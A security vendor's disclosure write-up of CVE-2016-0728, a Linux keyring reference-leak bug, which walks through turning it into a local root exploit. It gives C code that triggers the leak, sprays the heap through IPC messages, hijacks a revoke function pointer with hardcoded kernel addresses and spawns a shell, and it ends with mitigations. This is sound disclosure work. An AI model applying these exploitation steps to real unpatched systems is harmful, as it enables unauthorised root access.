The Perception Point Research team has identified a zero-day local privilege escalation vulnerability in the Linux kernel (CVE-2016-0728). Our team discovered the vulnerability recently, despite the kernel vulnerability existing since 2012. After the discovery, the team disclosed the details to the Linux kernel security team and developed a proof of concept (PoC) exploit.

As of the date of disclosure, the Linux kernel vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66% of all Android devices (phones/tablets). Neither our research team nor the Linux kernel security team have observed any exploit targeting this vulnerability in the wild. Despite this, our experts recommend that security teams examine potentially affected devices and implement patches as soon as possible. 

In this article we will examine the technical details of the Linux kernel vulnerability and the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.

The Linux kernel bug

CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details of this Linux kernel exploit, it is important to review the background behind the bug. To quote from Manpage, “The keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel.” System call interfaces [keyctl syscall] are provided so that userspace programs can manage those objects and use the facility for their own purposes.” There are two other syscalls that are used for handling keys (add_key and request_key), but keyctl is the most relevant in this use case. 

Each process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name) and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object’s internal refcount, stored in a field called “usage”, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, the execution jumps to error2 label which skips the call to key_put and leaks the reference that was increased by find_keyring_by_name.

long join_session_keyring(const char *name)
{
 ...
       new = prepare_creds();
 ...
       keyring = find_keyring_by_name(name, false); //find_keyring_by_name increments  keyring->usage if a keyring was found
       if (PTR_ERR(keyring) == -ENOKEY) {
               /* not found - try and create a new one */
               keyring = keyring_alloc(
                       name, old->uid, old->gid, old,
                       KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,
                       KEY_ALLOC_IN_QUOTA, NULL);
               if (IS_ERR(keyring)) {
                       ret = PTR_ERR(keyring);
                       goto error2;
               }
       } else if (IS_ERR(keyring)) {
               ret = PTR_ERR(keyring);
               goto error2;
       } else if (keyring == new->session_keyring) {
               ret = 0;
               goto error2; //<-- The bug is here, skips key_put.
       }
       /* we've got a keyring - now install it */
       ret = install_session_keyring_to_cred(new, keyring);
       if (ret < 0)
               goto error2;
       commit_creds(new);
       mutex_unlock(&key_session_mutex);
       ret = keyring->serial;
       key_put(keyring);
okay:
       return ret;
error2:
       mutex_unlock(&key_session_mutex);
error:
       abort_creds(new);
       return ret;
}

Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:

/* $ gcc leak.c -o leak -lkeyutils -Wall */
/* $ ./leak */
/* $ cat /proc/keys */
#include 
#include 
#include <sys/types.h>
#include 
int main(int argc, const char *argv[])
{
    int i = 0;
    key_serial_t serial;
    serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
    if (serial < 0) {
        perror("keyctl");
        return -1;
    }
    if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL) < 0) {
        perror("keyctl");
        return -1;
    }
    for (i = 0; i < 100; i++) {
        serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, "leaked-keyring");
        if (serial < 0) {
            perror("keyctl");
            return -1;
        }
    }
    return 0;
}

This string of code results in the following output having leaked-keyring 100 references:

Exploiting the Linux kernel bug

Though the bug itself can directly cause a memory leak, it also has far more serious consequences.

After a quick examination of the relevant code flow, our research team found that the usage field used to store the reference count for the object is of type atomic_t, which under the hood is basically an int – meaning 32-bit on both 32-bit and 64-bit architectures. While every integer is theoretically possible to overflow, this particular observation makes practical exploitation of this bug as a way to overflow the reference count seem feasible. As it turns out, no checks are performed to prevent overflowing the usage field from wrapping around to 0.

If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it after the kernel frees the object, it will cause the kernel to reference deallocated or reallocated memory. This means that you can achieve a use-after-free by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps wouldn’t surprise an experienced vulnerability researcher. The outline of the steps that need to be executed by the exploit code is as follows:

  1. Hold a (legitimate) reference to a key object
  2. Overflow the same object’s usage
  3. Get the keyring object freed
  4. Allocate a different kernel object from user-space, with a user-controlled content, over the same memory previously used by the freed keyring object
  5. Use the reference to the old key object and trigger code execution

The first step comes from the manpage and the subsequent step was explained earlier. Now, let’s dive into the technical details of the remaining steps.

Overflowing usage Refcount

This step is actually an extension of the bug. The usage field is of int type, meaning it has a max value of 2^32 both on 32-bit and 64-bit architectures. To overflow the usage field you must loop the snippet above 2^32 times to get usage to zero.

Freeing keyring object

There are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is by using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem. This frees any keyring object the moment the usage counter is 0. One caveat, though, is that join_session_keyring function prepare_creds also increments the current session keyring and abort_creds or commit_creds decrements it respectively. The problem is that abort_creds doesn’t decrement the keyring’s usage field synchronically but it is called later using rcu job, which means we can overflow the usage counter without knowing it was overflowed.

It is possible to solve this issue by using sleep(1) after each call to join_session_keyring, but it is of course not feasible to sleep(2^32) seconds. A feasible work around would be to use a variation of the divide-and-conquer algorithm and to sleep after 2^31-1 calls, then after 2^30-1 etc… This allows you to never overflow unintentionally because the maximum value of refcount can be double the value it should be if no jobs were called.

Allocating and controlling kernel object

With the process pointing to a freed keyring object, you now need to allocate a kernel object that will override the freed keyring object. That will be easy thanks to how SLAB memory works, allocating many objects of the keyring size just after the object is freed. In this case, we choose to use the Linux IPC subsystem to send messages of size 0xb8 – 0x30 when 0xb8 is the size of the keyring object and 0x30 is the size of a message header.

if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
    perror("msgget");
    exit(1);
}
for (i = 0; i < 64; i++) {
    if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
        perror("msgsnd");
        exit(1);
    }
}

This way we control the lower 0x88 bytes of the keyring object.

Gaining kernel code execution

From here it’s a relatively easy process due to the struct key_type inside the keyring object, which contains many function pointers. An interesting function pointer is the revoke function pointer which can be invoked using the keyctl(KEY_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:

void key_revoke(struct key *key)
{
       . . .
       if (!test_and_set_bit(KEY_FLAG_REVOKED, &key->flags) &&
           key->type->revoke)
               key->type->revoke(key);
       . . .
}

The keyring object should be filled as follows:

The uid and flags attributes should be filled in order to pass a few control checks until the execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers with revoke pointing to a function that will be executed with root privileges. Below is a code snippet that demonstrates this:

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
struct key_type_s {
    void * [12] padding;
    void * revoke;
} type;
_commit_creds commit_creds = 0xffffffff81094250;
_prepare_kernel_cred prepare_kernel_cred = 0xffffffff81094550;
void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}
int main(int argc, const char *argv[]) {
    ...
    struct key_type * my_key_type = NULL;
    ...
    my_key_type = malloc(sizeof(*my_key_type));
    my_key_type->revoke = (void*)userspace_revoke;
    ...
}

Addresses of commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device. The last step concludes the process:

execl("/bin/sh", NULL);

For more information, refer to this link to view the full Linux kernel exploit which runs on kernel 3.18 64-bit. The following is the output of running the full exploit which takes about 30 minutes to run on Intel Core i7-5500 CPU (typically time is not an issue in a privilege escalation exploit):

Linux kernel vulnerability mitigations

The vulnerability affects any Linux kernel version 3.8 and higher. SMEP & SMAP will make it difficult to exploit as well as SELinux on Android devices. It is important to patch it as soon as you can in order to eliminate the vulnerability for exploitation.

Thank you to David Howells, Wade Mealing, and the whole Red Hat Security team for that fast response and their cooperation fixing the bug.

To discover more of Perception Point’s threat detection capabilities, see our Enterprise Email Security solution for all email-borne threats.

Here’s some related content you may enjoy: What is a Zero Day Attack?